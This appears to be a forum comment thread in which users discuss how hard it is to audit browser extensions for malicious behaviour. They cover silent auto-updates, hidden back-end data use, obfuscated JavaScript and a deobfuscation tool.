[userbinator]

Aren't extensions written in JavaScript? That alone sounds like it'd make it pretty easy to examine and remove any "unwanted functionality" from one, or to show that it's doing something it shouldn't be. It only takes one knowledgeable user to find out and spread the news...

As an aside, I'm surprised at how willing most users seem to be to install any software, be it browser extensions or random apps on their phones/tablets/PCs. Especially in the case of deliberately malicious extensions mentioned in the article, I wonder if they were installed without the user ever considering "What is this for? Do I really need it?"

[r1ch]

It's easy to examine once, but once you grant permissions, the author can silently push out a malicious update at any time. I really wish there was a way to disable auto update on an extension by extension basis.

[dragonwriter]

> Aren't extensions written in JavaScript? That alone sounds like it'd make it pretty easy to examine and remove any "unwanted functionality" from one

How? One of the biggest offenders are extensions whose expected behavior is to send large amounts of data to a remote server to be used on your behalf, but where they actually then use the information for other purposes, sell it to others, etc.

Examining the client side JS will never tell you what the back end is doing with the data, only what data is transferred, and so won't identify this kind of nefarious behavior at all.

[tomjen3]

>That alone sounds like it'd make it pretty easy to examine and remove

Minified and obfuscated Javascript is not much easier to check than binary files and more difficult than e.g Java class files, at least without ProGuard.

[STRML]

Just as a reference, you might like this tool - I've gotten great results with some really gnarly minified/obfuscated JS.

http://www.jsnice.org/

[tomjen3]

Oh there is a built in version in the Chrome debugger.

And it can sure handle js uglify, etc there are tools and systems that allow you to remove more than that and then it becomes really difficult to get a handle on WTF is going on.

[STRML]

Sure, but this one is much more advanced than the the one in the Chrome Inspector, which only formats. This one renames variables and functions, adds comments, and even annotates types.

[jfoster]

There are lots of potential explanations which don't involve stupidity. Users may mistakenly assume apps/extensions are nowadays sufficiently sandboxed. Users may also be assuming that the Chrome Web Store is a somewhat reputable marketplace with any malicious software weeded out.

[CaveTech]

Tons of extensions serve the purpose of modifying actual pages to change/modify/add content. When users have many extensions, it's near impossible to determine which one is the bad actor without a lot of leg work. But people do figure it out and spread the news exactly how you describe. The problem is most people don't read the reviews and most casual internet users have no idea what's wrong if the functionality is added after the fact.